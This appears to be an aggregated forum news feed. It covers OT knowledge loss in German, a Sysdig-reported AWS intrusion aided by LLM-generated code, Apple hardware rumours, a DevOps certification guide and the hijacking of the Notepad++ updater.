Herausforderungen bei der Implementierung:
Komplexe Netzwerkintegration: Die Installation neuer Geräte, die früher nur wenige Tage dauerte, nimmt nun Wochen oder Monate in Anspruch. Der Grund: Die neuen Mitarbeitenden müssen die bestehenden Netzwerkkonfigurationen zunächst zurückentwickeln, um die Kompatibilität sicherzustellen. Ineffiziente Fehlerbehebung: Wenn Integrationsprobleme auftreten, müssen unerfahrene Mitarbeitende häufig Trial-and-Error-Ansätze anwenden, anstatt auf historische Kenntnisse ähnlicher Probleme und deren Lösungen zurückgreifen zu können. Abhängigkeit von Anbietern: Unternehmen sind zunehmend auf externe Systemintegratoren und Gerätehersteller angewiesen, um ihre eigenen Netzwerke zu verwalten. Das erhöht die Projektkosten und -laufzeiten erheblich. 3. Unbeabsichtigte Cybersicherheitslücken
Ein verstecktes Risiko liegt in gut gemeinten Verbesserungen der Cybersicherheit, die tatsächlich die Angriffsfläche vergrößern. Das neue Personal, das in modernen IT-Sicherheitspraktiken geschult ist, implementiert häufig Lösungen, die für OT-Umgebungen ungeeignet sind oder unbeabsichtigt zuvor isolierte Systeme offenlegen.
Häufige Muster für die Schaffung von Schwachstellen:
Fehlerhafte Netzwerksegmentierung: Versuche, eine moderne Trennung in Netzwerksegmente zu implementieren, verbinden versehentlich zuvor isolierte Netzwerkteile miteinander. So entstehen neue Angriffspfade, die in der alten Konfiguration nicht existierten. Fehlkonfigurationen von Firewalls: Durch mangelnde Kenntnisse von Legacy-Protokollen können moderne Firewall-Implementierungen legitime industrielle Kommunikationen blockieren und gleichzeitig unbefugte Zugriffe nicht verhindern. Diese drei Hauptrisiken verstärken sich gegenseitig, wenn sie gleichzeitig auftreten. Dies ist immer häufiger der Fall, da Unternehmen versuchen, veraltete Infrastrukturen zu modernisieren und gleichzeitig den Wandel in der Belegschaft zu bewältigen. (jm)
Lesetipp: KI schafft neue Sicherheitsrisiken für OT-Netzwerke
View the full article
- 0 comments
- 33 views
-
Zwar stellen Cyberkriminelle und staatlich unterstützte Angreifer gerade für den Industriesektor eine enorme und steigende Gefahr dar. Dennoch besteht die größte Bedrohung derzeit im mangelnden Wissenstransfer, was OT-Sicherheit und -Organisation (Operational Technology) angeht. Das Hauptproblem sind vertrauenswürdige Mitarbeiter, die in Rente gehen.
Diese Personen sind in der Regel engagiert, sachkundig und unersetzlich. Sie wissen, auf welchem unbeschrifteten Server das System zur Erfassung historischer Daten läuft, das die Aufsichtsbehörden verlangen. Sie erinnern sich daran, warum ein bestimmtes VLAN mit scheinbar zufälligen IP-Adressen konfiguriert wurde. Sie wissen, welche Netzwerkrouten nur unter Produktionsstillstand geändert werden können. Ihr institutionelles Wissen umfasst somit Tausende von IP-Adressen, undokumentierte Netzwerkrouten und versteckte VLANs, die in der offiziellen Dokumentation fehlen.
Ihre Nachfolger hingegen bringen Erwartungen an moderne, gut dokumentierte Netzwerkarchitekturen mit. Stattdessen erben sie ein komplexes Geflecht aus Altsystemen, proprietären Protokollen und undokumentierten Konfigurationen, die das Ergebnis jahrzehntelanger schrittweiser Änderungen und Notfallkorrekturen sind. Die Diskrepanz zwischen Erwartungen und Realität führt zu einer Wissenslücke, die sowohl die Betriebskontinuität als auch die Cybersicherheit gefährdet.
Hierbei handelt es sich jedoch um eine Art „Single Point of Failure“, den die meisten Unternehmen erst erkennen, wenn es bereits zu spät ist.
Der Weggang erfahrener OT-Fachkräfte birgt drei kritische Risiken, die weit über einfache Personalprobleme hinausgehen und bei herkömmlichen Risikobewertungen meist unterschätzt werden:
1. Systemausfälle während der Modernisierung
Das unmittelbare und schwerwiegendste Risiko besteht in unbeabsichtigten Folgen während System-Upgrades oder Modernisierungsmaßnahmen. Ältere OT-Netzwerke enthalten das, was Branchenexperten als „archäologische Schichten“ bezeichnen: Jahrzehntelange inkrementelle Modifikationen, Notfallkorrekturen und undokumentierte Konfigurationen, die versteckte Abhängigkeiten schaffen.
Die größten Risiken:
Nicht dokumentierte Altsysteme: Die meisten Produktionsstätten verfügen über mindestens ein Windows-NT- oder Windows-XP-System, auf dem unverzichtbare historische Daten gespeichert sind oder zentrale Prozesse gesteuert werden. Diese Systeme sind oft nicht hinreichend dokumentiert. Ihre Entfernung im Zuge von Modernisierungsmaßnahmen kann zum Verlust der Produktionsdaten von Jahrzehnten führen, die für die Einhaltung gesetzlicher Vorgaben erforderlich sind. Versteckte Netzwerkabhängigkeiten: IP-Routing-Tabellen, VLAN-Konfigurationen und Firewall-Regeln enthalten oft scheinbar willkürliche Einstellungen, die jedoch tatsächlich Netzwerkkonflikte verhindern oder die Kommunikation kritischer Systeme aufrechterhalten. Eine Änderung dieser Konfigurationen ohne institutionelles Wissen kann zu einem Dominoeffekt über mehrere Produktionslinien hinweg führen. Anforderungen an proprietäre Protokolle: Viele ältere Industriesysteme kommunizieren über proprietäre oder modifizierte Standardprotokolle. Die spezifischen Konfigurationsparameter, die diese Kommunikation ermöglichen, sind selten dokumentiert und existieren nur im institutionellen Wissen ausscheidender Mitarbeiter. Lesetipp: CISOs müssen OT-Risiken stärker adressieren
2. Verlängerte Time-to-Value für neue Geräte und Prozesse
Der Verlust von spezifischem Know-how verlängert die Implementierungszeiten für neue Geräte, Prozessverbesserungen und Systemintegrationen erheblich. Dieser Effekt verstärkt sich mit der Zeit und führt zu Wettbewerbsnachteilen und verpassten Optimierungsmöglichkeiten.
Herausforderungen bei der Implementierung:
Komplexe Netzwerkintegration: Die Installation neuer Geräte, die früher nur wenige Tage dauerte, nimmt nun Wochen oder Monate in Anspruch. Der Grund: Die neuen Mitarbeitenden müssen die bestehenden Netzwerkkonfigurationen zunächst zurückentwickeln, um die Kompatibilität sicherzustellen. Ineffiziente Fehlerbehebung: Wenn Integrationsprobleme auftreten, müssen unerfahrene Mitarbeitende häufig Trial-and-Error-Ansätze anwenden, anstatt auf historische Kenntnisse ähnlicher Probleme und deren Lösungen zurückgreifen zu können. Abhängigkeit von Anbietern: Unternehmen sind zunehmend auf externe Systemintegratoren und Gerätehersteller angewiesen, um ihre eigenen Netzwerke zu verwalten. Das erhöht die Projektkosten und -laufzeiten erheblich. 3. Unbeabsichtigte Cybersicherheitslücken
Ein verstecktes Risiko liegt in gut gemeinten Verbesserungen der Cybersicherheit, die tatsächlich die Angriffsfläche vergrößern. Das neue Personal, das in modernen IT-Sicherheitspraktiken geschult ist, implementiert häufig Lösungen, die für OT-Umgebungen ungeeignet sind oder unbeabsichtigt zuvor isolierte Systeme offenlegen.
Häufige Muster für die Schaffung von Schwachstellen:
Fehlerhafte Netzwerksegmentierung: Versuche, eine moderne Trennung in Netzwerksegmente zu implementieren, verbinden versehentlich zuvor isolierte Netzwerkteile miteinander. So entstehen neue Angriffspfade, die in der alten Konfiguration nicht existierten. Fehlkonfigurationen von Firewalls: Durch mangelnde Kenntnisse von Legacy-Protokollen können moderne Firewall-Implementierungen legitime industrielle Kommunikationen blockieren und gleichzeitig unbefugte Zugriffe nicht verhindern. Diese drei Hauptrisiken verstärken sich gegenseitig, wenn sie gleichzeitig auftreten. Dies ist immer häufiger der Fall, da Unternehmen versuchen, veraltete Infrastrukturen zu modernisieren und gleichzeitig den Wandel in der Belegschaft zu bewältigen. (jm)
Lesetipp: KI schafft neue Sicherheitsrisiken für OT-Netzwerke
View the full article
- 0 comments
- 34 views
-
According to new findings from Sysdig’s Threat Research Team, the intruders turned a single exposed credential in a public S3 bucket into full administrative control, demonstrating how AI‑assisted automation has collapsed the cloud attack lifecycle from hours to mere minutes.
The operation, observed in November 2025, reportedly combined a cloud misconfiguration with large language models (LLMs) to compress the entire attack lifecycle.
“The cybersecurity world today is brand new,” said Ram Varadarajan, CEO at Acalvio. “In this threat environment, organizations have to accept that the speed of the breach has shifted from days to minutes. Autonomous intruders can now escalate from initial access to full administrative control in minutes.” Defending against this class of attacks, he added, demands “AI-focused technology” that can reason and respond at the same speed as automated attackers.”
Public Buckets to privilege escalation in minutes
The compromise began with valid AWS credentials left exposed in public S3 buckets. Those buckets contained AI-related data, and the associated IAM user had permissions to interact with Lambda and limited access to Amazon Bedrock. “This user was likely intentionally created by the victim organization to automate Bedrock tasks with Lambda functions across the environment,” Sysdig researchers said in a blog post shared with CSO ahead of its publication on Tuesday.
With read access across the environment, the attacker rapidly enumerated AWS services, then escalated privileges by modifying an existing Lambda function. By injecting malicious code into a function that already had an overly permissive execution role, the attacker was able to create new access keys for an administrative user and retrieve them directly from the Lambda execution output.
Jason Soroko, senior fellow at Sectigo, said the root cause was depressingly familiar. “We must look past the novelty of AI assistance to recognize the mundane error that enabled it,” he said. “The entire compromise began because the victim left valid credentials exposed in public S3 buckets. This failure represents a stubborn refusal to master security fundamentals.”
The Lambda code showed signs of LLM generation, including comprehensive exception handling, iterative targeting logic, and even non-English comments.
Lateral movement, LLMjacking, and GPU abuse
Once administrative access was obtained, the attacker moved laterally across 19 distinct AWS principals, assuming multiple roles and creating new users to spread activity across identities. This approach enabled persistence and complicated detection, the researchers noted.
The attackers then shifted focus to Amazon Bedrock, enumerating available models and confirming that model invocation logging was disabled. The researchers said multiple foundation models were invoked, a pattern consistent with “LLMjacking”.
Then, the operation escalated into resource abuse. After preparing keys and security groups, the attackers attempted to initiate high-end GPU instances for machine learning workloads. While most powerful instances failed due to capacity limits, a costly GPU instance was eventually launched, with scripts to install CUDA, deploy training frameworks, and expose a public JupyterLab interface.
Some of the code was found referencing nonexistent repositories and resources, which Sysdig researchers attributed to LLM hallucinations.
Experts argue that the most unsettling takeaway isn’t that AI introduced a new attack technique. It is that AI removed hesitation.“When you strip this attack down to its essentials, what stands out isn’t a breakthrough technique,” said Shane Barney, CISO at Keeper Security. “It’s how little resistance the environment offered once the attacker obtained legitimate access.” He warned that AI collapses reconnaissance, privilege testing, and lateral movement into “a single, rapid sequence,” eliminating the buffer time defenders have historically relied on.
To reduce exposure, Sysdig researchers advised enforcing least privilege across IAM users, roles, and Lambda execution roles, tightly limiting permissions such as “UpdateFunctionCode” and “PassRole”, and ensuring sensitive S3 buckets are never public. Enabling Lambda versioning, turning on Amazon Bedrock model invocation logging, and monitoring for large-scale enumeration activity are also critical, they added.
View the full article
- 0 comments
- 34 views
-
According to new findings from Sysdig’s Threat Research Team, the intruders turned a single exposed credential in a public S3 bucket into full administrative control, demonstrating how AI‑assisted automation has collapsed the cloud attack lifecycle from hours to mere minutes.
The operation, observed in November 2025, reportedly combined a cloud misconfiguration with large language models (LLMs) to compress the entire attack lifecycle.
“The cybersecurity world today is brand new,” said Ram Varadarajan, CEO at Acalvio. “In this threat environment, organizations have to accept that the speed of the breach has shifted from days to minutes. Autonomous intruders can now escalate from initial access to full administrative control in minutes.” Defending against this class of attacks, he added, demands “AI-focused technology” that can reason and respond at the same speed as automated attackers.”
Public Buckets to privilege escalation in minutes
The compromise began with valid AWS credentials left exposed in public S3 buckets. Those buckets contained AI-related data, and the associated IAM user had permissions to interact with Lambda and limited access to Amazon Bedrock. “This user was likely intentionally created by the victim organization to automate Bedrock tasks with Lambda functions across the environment,” Sysdig researchers said in a blog post shared with CSO ahead of its publication on Tuesday.
With read access across the environment, the attacker rapidly enumerated AWS services, then escalated privileges by modifying an existing Lambda function. By injecting malicious code into a function that already had an overly permissive execution role, the attacker was able to create new access keys for an administrative user and retrieve them directly from the Lambda execution output.
Jason Soroko, senior fellow at Sectigo, said the root cause was depressingly familiar. “We must look past the novelty of AI assistance to recognize the mundane error that enabled it,” he said. “The entire compromise began because the victim left valid credentials exposed in public S3 buckets. This failure represents a stubborn refusal to master security fundamentals.”
The Lambda code showed signs of LLM generation, including comprehensive exception handling, iterative targeting logic, and even non-English comments.
According to an AWS spokesperson, AWS services and infrastructure are not affected by this issue, and they operated as designed throughout the incident described. “The report describes an account compromised through misconfigured S3 buckets. We recommend all customers secure their cloud resources by following security, identity, and compliance best practices, including never opening up public access to S3 buckets or any storage service, least-privilege access, secure credential management, and enabling monitoring services like GuardDuty, to reduce risks of unauthorized activity. AWS customers who suspect or become aware of malicious activity within their AWS accounts should follow guidance for remediating potentially compromised AWS credentials or contact AWS Support for assistance.”
Lateral movement, LLMjacking, and GPU abuse
Once administrative access was obtained, the attacker moved laterally across 19 distinct AWS principals, assuming multiple roles and creating new users to spread activity across identities. This approach enabled persistence and complicated detection, the researchers noted.
The attackers then shifted focus to Amazon Bedrock, enumerating available models and confirming that model invocation logging was disabled. The researchers said multiple foundation models were invoked, a pattern consistent with “LLMjacking”.
Then, the operation escalated into resource abuse. After preparing keys and security groups, the attackers attempted to initiate high-end GPU instances for machine learning workloads. While most powerful instances failed due to capacity limits, a costly GPU instance was eventually launched, with scripts to install CUDA, deploy training frameworks, and expose a public JupyterLab interface.
Some of the code was found referencing nonexistent repositories and resources, which Sysdig researchers attributed to LLM hallucinations.
Experts argue that the most unsettling takeaway isn’t that AI introduced a new attack technique. It is that AI removed hesitation.“When you strip this attack down to its essentials, what stands out isn’t a breakthrough technique,” said Shane Barney, CISO at Keeper Security. “It’s how little resistance the environment offered once the attacker obtained legitimate access.” He warned that AI collapses reconnaissance, privilege testing, and lateral movement into “a single, rapid sequence,” eliminating the buffer time defenders have historically relied on.
To reduce exposure, Sysdig researchers advised enforcing least privilege across IAM users, roles, and Lambda execution roles, tightly limiting permissions such as “UpdateFunctionCode” and “PassRole”, and ensuring sensitive S3 buckets are never public. Enabling Lambda versioning, turning on Amazon Bedrock model invocation logging, and monitoring for large-scale enumeration activity are also critical, they added.
View the full article
- 0 comments
- 26 views
-
- 0 comments
- 38 views
-
Apple is rumored to launch the A20 chip with new iPhone models in the fall, and the M6 family of Apple silicon chips in redesigned MacBook Pro models featuring OLED displays later this year. The latest report claims that the company will not move to TSMC's most advanced 2-nanometer manufacturing variant for these chip generations.
TSMC's 2-nanometer family marks the company's transition from FinFET transistors to gate-all-around technology, which is intended to improve power efficiency and performance scaling as chip densities increase. TSMC previously said that its base N2 process will enter mass production in 2026, followed by enhanced variants including N2P and A16 in the second half of the year. This may not be enough time for Apple to introduce chips made with the newer technology to its devices.
N2P is positioned as a higher-performance version of N2, while A16 is designed for high-power and high-complexity chips, particularly for AI applications and data centers. The performance difference between N2 and N2P is expected to be modest. N2P offers roughly a 5% performance gain at the same power level, but comes at a higher manufacturing cost, which helps explain why Apple is expected to remain on N2 for its A- and M-series chips this year.
Competitors including Qualcomm and MediaTek are expected to adopt N2P for their flagship mobile chips in order to reach higher peak clock speeds. TSMC apparently expects the 2-nanometer generation to have a long lifecycle and potentially scale beyond its 3-nanometer family. Companies including AMD, Google, and Amazon are expected to adopt 2-nanometer processes for future CPUs, GPUs, and AI chips.
Supply availability is also thought to be a factor. Demand for 2-nanometer manufacturing has apparently exceeded expectations, with much of the initial N2 capacity already reserved by leading customers such as Apple. This early capacity allocation reduces the need for Apple to move to N2P simply to secure production volume for future A-series and M-series chips.Tags: 2nm, Apple Silicon, TSMC
This article, "Apple Seemingly Avoiding Latest Chip Tech for New iPhones and Macs" first appeared on MacRumors.com
View the full article
- 0 comments
- 26 views
-
- 0 comments
- 33 views
-
In his Power On newsletter on Sunday, Gurman noted that inventory of the current Studio Display is running low on Apple's online store and at its retail stores, although this has generally been the case for a while now. Extended shipping estimates on Apple's online store can sometimes hint at an upcoming product refresh.
Last month, an unreleased Apple monitor with the model number A3350 surfaced in a Chinese regulatory database, and it is likely the Studio Display 2.
Unfortunately, the database entry did not reveal any new details about the Studio Display 2, beyond indicating that it will still have an LCD display instead of an OLED display. However, mini-LED backlighting remains a possibility.
There have been many reports about a new Studio Display being in the works, with rumored features including mini-LED backlighting, ProMotion support for up to a 120Hz refresh rate, HDR support, and either an A19 or A19 Pro chip.
The current Studio Display was filed in the same Chinese database around three months before it launched, so perhaps the next Studio Display will be released around March or April, but Apple has until the end of June if we go by Gurman's timeframe. It would make sense for Apple to unveil a new Studio Display alongside the next Mac Studio with M5 Max and M5 Ultra chips, or perhaps a new Mac mini, but it is not strictly necessary.
If the next Studio Display receives mini-LED backlighting and HDR support, its maximum brightness and contrast ratio would be higher than the current model. And a newer A19 or A19 Pro chip — up from the A13 Bionic currently — should contribute to performance improvements, camera-related enhancements, and more.
The current Studio Display features a 27-inch 5K screen, a 60Hz refresh rate, up to 600 nits brightness, a built-in camera and speakers, one Thunderbolt 3 port, and three USB-C ports. In the U.S., pricing starts at $1,599.Related Roundups: Apple Pro Display XDR, Apple Studio DisplayTag: Mark GurmanRelated Forum: Mac Accessories
This article, "Apple's Studio Display 2 Reportedly on Track to Launch This Year With These New Features" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 27 views
-
Samsung Display will reportedly begin mass production of eighth-generation OLED displays for the device in May. Samsung is planing to ship two million of these displays to Apple by the end of the year. The panel will be sent to Foxconn from the third quarter of 2026 for assembly into the final machines.
Some components for the device are said to still in development, since Apple has been changing the design of some parts to reduce manufacturing costs. China's BOE is also hoping to supply Apple with OLED displays for the MacBook Pro, but only unit with Samsung displays will be available this year.
The fourth quarter of 2026 runs from October to December. The OLED MacBook Pro is expected to feature 14- and 16-inch display size options, M6-series chips, and the first complete redesign of the device since 2021. Related Roundup: MacBook ProTags: BOE, OLED, Samsung, The ElecBuyer's Guide: MacBook Pro (Caution)Related Forum: MacBook Pro
This article, "Report: OLED MacBook Pro to Launch This Year" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 28 views
-
DevOps is no longer just a buzzword; it’s a culture and set of practices that is crucial for modern software development and IT operations. As organizations seek faster deployment cycles, more reliable releases, and better collaboration between development and operations teams, the need for skilled professionals who can implement DevOps practices becomes more evident.
A Certified DevOps Engineer (CDE) is a credential that demonstrates your proficiency in implementing and managing DevOps practices across an organization. Earning the CDE certification can significantly elevate your career, offering you opportunities to work with cutting-edge technologies, lead DevOps transformations, and become a key player in any technology-driven organization. Whether you are an engineer, manager, or IT professional, this certification helps validate your skills and opens doors to high-impact roles.
What is the Certified DevOps Engineer (CDE) Certification?
The Certified DevOps Engineer certification is an industry-recognized credential designed to validate the skills and knowledge required to manage and implement DevOps practices. This certification focuses on critical aspects of DevOps, including automation, continuous integration and delivery (CI/CD), infrastructure management, cloud platforms, and collaboration across development, operations, and security teams.
The certification covers a broad range of topics, from scripting and automation to cloud services and containerization, helping professionals gain a comprehensive understanding of the tools and practices essential for successfully implementing DevOps. It is ideal for engineers, IT professionals, and managers who want to specialize in DevOps practices, helping them to streamline workflows, improve quality, and accelerate product delivery.
Who Should Take the Certified DevOps Engineer Certification?
The CDE certification is ideal for professionals who:
Are involved in software development and operations. Want to enhance their skills in automation, CI/CD, infrastructure as code (IaC), and cloud technologies. Seek career advancement in DevOps or related roles. Are aiming to lead DevOps transformation initiatives in their organizations. It’s also perfect for engineers, managers, and architects who are looking to bridge the gap between development and operations.
Skills You’ll Gain with CDE Certification
By completing the Certified DevOps Engineer certification, you will develop the following skills:
Automation of Deployment Processes
Implementing automated pipelines and release management. Infrastructure Management
Managing and provisioning infrastructure using IaC tools like Terraform, Ansible, etc. Continuous Integration/Continuous Delivery (CI/CD)
Building and managing pipelines for seamless code integration and delivery. Cloud Technologies
Working with AWS, Azure, Google Cloud for scalable and reliable infrastructure. Collaboration and Communication
Fostering effective collaboration between development, operations, and QA teams. Real-World Projects You Can Tackle After This Certification
As a Certified DevOps Engineer, you should be able to work on the following real-world projects:
Building CI/CD pipelines for automated testing and deployment
Automating code validation and deployment pipelines using Jenkins, GitLab CI, and others. Implementing Infrastructure as Code (IaC) with Terraform or CloudFormation
Automating infrastructure provisioning to create reproducible and scalable environments. Cloud Migration and Optimization
Moving applications to the cloud and optimizing infrastructure for cost-effectiveness and scalability. Monitoring and Metrics Implementation
Implementing monitoring tools such as Prometheus and Grafana to ensure system reliability and performance. Preparation Plan: How to Get Certified?
7–14 Days Preparation Plan:
Day 1–3: Understand the fundamentals of DevOps principles, CI/CD, and cloud technologies. Day 4–7: Dive deep into tools like Jenkins, Docker, Kubernetes, and AWS. Day 8–10: Study automation, configuration management, and monitoring tools. Day 11–14: Practice with real-world projects, set up CI/CD pipelines, and infrastructure automation. 30 Days Preparation Plan:
Week 1–2: Cover DevOps foundations, CI/CD, and version control systems. Week 3: Focus on infrastructure management, including cloud platforms and IaC tools. Week 4: Implement real-world DevOps pipelines and gain hands-on practice. 60 Days Preparation Plan:
Week 1–2: Master DevOps lifecycle, CI/CD, version control, and monitoring tools. Week 3–4: Study automation, IaC, and cloud platforms like AWS, Azure, and GCP. Week 5–6: Build end-to-end pipelines, understand security practices, and review common challenges. Common Mistakes to Avoid
Achieving DevOps certification requires a focused and disciplined approach. Here are some common mistakes to avoid during your preparation:
Neglecting Hands-On Practice: DevOps is all about practical skills. While theoretical knowledge is essential, you must dedicate time to working with the actual tools and technologies (e.g., Jenkins, Docker, Terraform) to gain hands-on experience. Skipping the Fundamentals: DevOps is built on foundational concepts like version control, CI/CD, and automation. Don’t skip over these core topics, as they form the basis for more advanced practices. Rushing Through Preparation: DevOps requires a deep understanding of various tools and practices. Take your time to master each topic rather than rushing through them. Continuous learning and hands-on practice will yield the best results. Ignoring Cloud Platforms: Cloud technologies, such as AWS, Azure, and Google Cloud, play a significant role in DevOps. Make sure you familiarize yourself with at least one cloud platform to ensure a comprehensive understanding of DevOps practices. Overlooking Security Practices (DevSecOps): In DevOps, security isn’t an afterthought. Understand and implement DevSecOps practices to ensure the security of the entire pipeline. Best Next Certification After CDE
After obtaining your Certified DevOps Engineer (CDE) certification, it’s important to continue growing your skills and expand into new areas of expertise. Here are some top options for your next certification:
Same Track: Certified DevSecOps Professional
After becoming a CDE, a natural progression would be to dive into DevSecOps. This certification focuses on integrating security practices into the DevOps pipeline, ensuring that security is an integral part of the software development lifecycle. Cross-Track: Certified Kubernetes Administrator (CKA)
Kubernetes is a key tool in modern DevOps environments for orchestrating containerized applications. The CKA will enhance your skills in managing and deploying applications using Kubernetes. Leadership: Certified DevOps Leader (DOL)
For those looking to take on leadership roles, the Certified DevOps Leader certification focuses on the strategic aspects of DevOps, helping you lead teams and manage large-scale DevOps transformations. Choose Your Path: 8 Learning Paths
After achieving the Certified DevOps Engineer certification, you can explore specialized learning paths depending on your career aspirations. Here are 8 potential learning tracks you can pursue:
DevOps: Deepen your expertise in automation, cloud platforms, CI/CD, and version control systems. DevSecOps: Specialize in securing DevOps pipelines by integrating security practices and tools (e.g., static code analysis, security testing). SRE (Site Reliability Engineering): Focus on system reliability, scalability, and automation of operational tasks for highly available systems. AIOps/MLOps: Learn how to incorporate AI and machine learning into the DevOps workflow, automating decision-making and monitoring tasks. DataOps: Specialize in managing and automating data workflows within a DevOps environment, enabling faster and more reliable data-driven decision-making. FinOps: Gain expertise in cloud financial management, helping organizations optimize their cloud spending while maintaining operational efficiency. Cloud Engineering: Develop a strong focus on cloud technologies (AWS, Azure, Google Cloud), infrastructure management, and cloud-native application development. Platform Engineering: Learn to build and maintain the underlying platforms and services that enable DevOps practices at scale across various environments. Role → Recommended Certifications
RoleRecommended CertificationsDevOps EngineerCertified DevOps EngineerSRECertified Site Reliability EngineerPlatform EngineerCertified DevOps EngineerCloud EngineerAWS Certified Solutions ArchitectSecurity EngineerCertified DevSecOps ProfessionalData EngineerData Engineering with Google CloudFinOps PractitionerFinOps Certified PractitionerEngineering ManagerCertified DevOps Engineer, Certified ScrumMaster Top Institutions Offering Training and Certification for CDE
Several institutions offer training and certification for Certified DevOps Engineer (CDE), providing valuable learning resources and practical experience. Some of the top providers include:
DevOpsSchool: DevOpsSchool is a leading provider of DevOps training with comprehensive courses and hands-on labs, backed by real-world projects and instructor-led sessions. Cotocus: Known for providing expert-led, real-time project-based training, Cotocus offers specialized courses in DevOps, focusing on automation and continuous delivery. Scmgalaxy: A trusted name in the DevOps training space, Scmgalaxy offers courses that cover all DevOps principles, tools, and practices, ensuring you are industry-ready. BestDevOps: Offers a wide range of DevOps training programs with hands-on learning experiences in CI/CD, cloud platforms, and automation. DevSecOpsSchool: A specialized provider offering DevSecOps training for professionals who want to integrate security into the DevOps lifecycle. SRESchool: Offers comprehensive SRE-focused DevOps training with a focus on system reliability, automation, and scaling. AIOpsSchool: Offers specialized training in AI and machine learning operations for professionals looking to integrate AI into their DevOps practices. DataOpsSchool: Focuses on the intersection of DevOps and data, helping engineers manage and automate data pipelines. FinOpsSchool: Provides training on managing cloud financials and optimizing cloud spending in DevOps environments. FAQs (Frequently Asked Questions)
1. How difficult is the Certified DevOps Engineer certification?
The exam is challenging, requiring in-depth knowledge and practical experience in DevOps tools and methodologies.
2. How much time should I spend preparing for the certification?
Typically, it takes about 30 to 60 days of consistent preparation to pass the exam.
3. Are there any prerequisites for taking the CDE exam?
There are no formal prerequisites, but a basic understanding of software development and IT operations will help.
4. Should I take the CDE certification exam before or after completing other certifications?
It’s best to take the CDE certification after gaining foundational knowledge in areas like CI/CD, cloud platforms, and version control.
5. What’s the career value of obtaining the Certified DevOps Engineer certification?
It significantly enhances your career by validating your expertise in DevOps, making you eligible for senior roles in the field.
6. What tools should I focus on during preparation?
Focus on tools like Jenkins, Docker, Kubernetes, Terraform, AWS, Git, and Ansible.
7. How do I structure my learning path for DevOps?
Start with DevOps basics, then dive into CI/CD, automation, and cloud tools before focusing on security and monitoring.
8. Can the CDE certification help in leadership roles?
Yes, it helps if you are aiming for leadership positions, as it demonstrates your expertise in managing complex DevOps projects.
Why This Matters
Becoming a Certified DevOps Engineer is a game-changer in today’s tech-driven world. With organizations increasingly relying on agile methodologies, automation, and continuous delivery to stay competitive, the demand for skilled DevOps professionals is higher than ever. Earning the CDE certification not only enhances your technical skills but also positions you as a leader in the field of software development and operations.
As a certified DevOps engineer, you will have the knowledge and skills to implement best practices, manage complex systems, and drive automation across your organization. Whether you’re aiming to deepen your technical expertise or expand into specialized tracks like DevSecOps, SRE, or AIOps, the CDE certification is the first step in an exciting and rewarding career journey.
View the full article
- 0 comments
- 35 views
-
In this Threat Analysis report, Cybereason Security Services investigates a fake installer attack we recently observed multiple times. We identified some findings that have not been documented in previous reports and obtained new threat intelligence insights from the malwares.
View the full article
- 0 comments
- 26 views
-
- 0 comments
- 36 views
-
The attack, which ran from June through December 2025, involved infrastructure-level compromise of Notepad++’s shared hosting provider that enabled threat actors to selectively intercept and redirect update traffic to servers under their control, Notepad++ author Don Ho said in the statement.
“Multiple independent security researchers have assessed that the threat actor is likely a Chinese state-sponsored group, which would explain the highly selective targeting observed during the campaign,” Ho wrote.
The incident highlights a critical blind spot in enterprise security. Attackers prize distribution points like update servers because one successful insertion delivers access to thousands of environments at once, according to a Forrester analysis also published Sunday.
The compromise is particularly concerning because Notepad++ is widely used by developers, analysts, and IT operators, yet “does not require an enterprise contract or license, and does not include usage tracking by default and therefore may not be tracked in an enterprise software inventory,” Forrester analysts Jeff Pollard, Allie Mellen, Jess Burn, Janet Worthington, and Tope Olufon wrote in their blog post.
How the attack unfolded
The compromise occurred at the hosting provider level rather than through vulnerabilities in Notepad++ code, Ho said in the note. Attackers gained access to the shared hosting server and redirected traffic from the update endpoint to attacker-controlled servers.
“The bad actors specifically searched for the Notepad++ domain to intercept the traffic to your website, as they might know the then-existing Notepad++ vulnerabilities related to insufficient update verification controls,” the hosting provider said in a statement shared by Ho.
The name of the hosting provider, however, is not disclosed in the blog post. A detailed query seeking comments from Ho remains unanswered.
The server was initially compromised until September 2, 2025, when scheduled maintenance included kernel and firmware updates. However, attackers maintained stolen credentials to internal services until December 2, 2025, allowing continued traffic interception, according to the provider’s statement. The targeting was highly selective — traffic from certain users was redirected while most legitimate updates proceeded normally, Ho said.
Rapid7 identifies custom malware
Cybersecurity firm Rapid7 also published a detailed technical analysis corroborating Ho’s disclosure and identifying the attack as part of a broader campaign deploying previously undocumented malware. Rapid7’s investigation uncovered a custom backdoor the firm dubbed “Chrysalis,” alongside Cobalt Strike and Metasploit frameworks.
“Forensic analysis conducted by the MDR team suggests that the initial access vector aligns with publicly disclosed abuse of the Notepad++ distribution infrastructure,” Rapid7 researcher Ivan Feigl wrote. The Chrysalis backdoor supports 16 distinct command capabilities ranging from interactive shell access to complete self-removal. One loader variant exploited Microsoft Warbird, an internal code protection framework, to execute shellcode while masquerading as a legitimate Microsoft-signed binary.
Rapid7 attributed the campaign to Lotus Blossom, also known as Billbug, a Chinese APT group active since 2009, known for espionage operations targeting government, telecommunications, and critical infrastructure sectors across Southeast Asia and Central America. The attribution is based on strong similarities to previously published Symantec research, particularly the use of a renamed Bitdefender executable to side-load malicious DLLs.
Why detection proved difficult
The sophisticated malware evaded detection for months largely because a compromised utility blends into normal developer behavior, making it challenging to identify. “Most EDR programs are blind by design to ‘expected’ developer behavior,” the Forrester analysts wrote. “A compromised utility does not need exploits, LOLBins, or exotic malware. It just needs to look boring—like something a dev would do.”
Ho noted that his incident response team was unable to extract concrete indicators of compromise despite analyzing roughly 400 GB of server logs. In an edit posted Sunday, Ho acknowledged Rapid7’s more detailed findings. “Last evening I received an email from Ivan Feigl (Rapid7) to share their excellent investigation story—it seems to be the same story, and obviously, they have more tangible information (including IoCs) than I do,” he wrote.
Rapid7 identified network infrastructure, including IP addresses in Malaysia and China, along with command and control URLs, including api.skycloudcenter.com and api.wiresguard.com.
Security enhancements and broader implications
In response, Notepad++ has migrated to a new hosting provider and enhanced WinGup (the updater component) in version 8.8.9 to verify both certificate and signature of downloaded installers, Ho said. Certificate and signature verification will be enforced starting with version 8.9.2, expected within approximately one month.
“I deeply apologize to all users affected by this hijacking,” Ho wrote. “I recommend downloading v8.9.1 and running the installer to update your Notepad++ manually.”
